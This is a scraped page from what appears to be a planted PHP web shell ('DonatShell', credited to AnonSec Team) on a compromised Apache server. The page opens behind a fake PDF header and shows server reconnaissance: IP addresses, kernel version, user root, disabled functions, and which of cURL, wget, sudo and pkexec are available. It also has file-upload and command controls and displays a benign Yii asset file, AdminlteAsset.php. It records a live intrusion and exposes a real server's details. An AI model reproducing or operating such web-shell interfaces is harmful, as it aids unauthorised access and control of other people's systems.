%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 49.231.201.246  /  Your IP : 216.73.216.248
Web Server : Apache/2.4.18 (Ubuntu)
System : Linux 246 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
User : root ( 0)
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/egp/theme/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /var/www/html/egp/theme/AdminlteAsset.php
<?php

namespace app\theme;

use yii;
use yii\web\AssetBundle;

class AdminlteAsset extends AssetBundle {

    public $sourcePath = '@app/web/adminlte';
    public $addons = [];
    public $css = [
//        'vendors/base/vendors.bundle.css',
//        'demo/default/base/style.bundle.css',
    ];
    public $js = [
//        'vendors/base/vendors.bundle.js',
//        'demo/default/base/scripts.bundle.js',
//        'app/js/dashboard.js',
        
    ];
    public $depends = [
//        'yii\web\YiiAsset',
//        'yii\bootstrap\BootstrapAsset',
//        'yii\bootstrap\BootstrapPluginAsset',
    ];

    /**
     * @inheritdoc
     */
    public function init() {

//        parent::init();
//
//        $controller = Yii::$app->controller->id . '/' . Yii::$app->controller->action->id;
//        if (array_key_exists($controller, $this->addons)) {
//            $additional = $this->addons[$controller];
//            if (array_key_exists('js', $additional) && is_array($additional['js'])) {
//                $this->js = array_merge($this->js, $additional['js']);
//            }
//            if (array_key_exists('css', $additional) && is_array($additional['css'])) {
//                $this->css = array_merge($this->css, $additional['css']);
//            }
//        }
//
//        if ($this->skin != "") {
//            $this->css[] = "base/assets/skins/" . $this->skin . ".css";
//        }
    }

}

Anon7 - 2022
AnonSec Team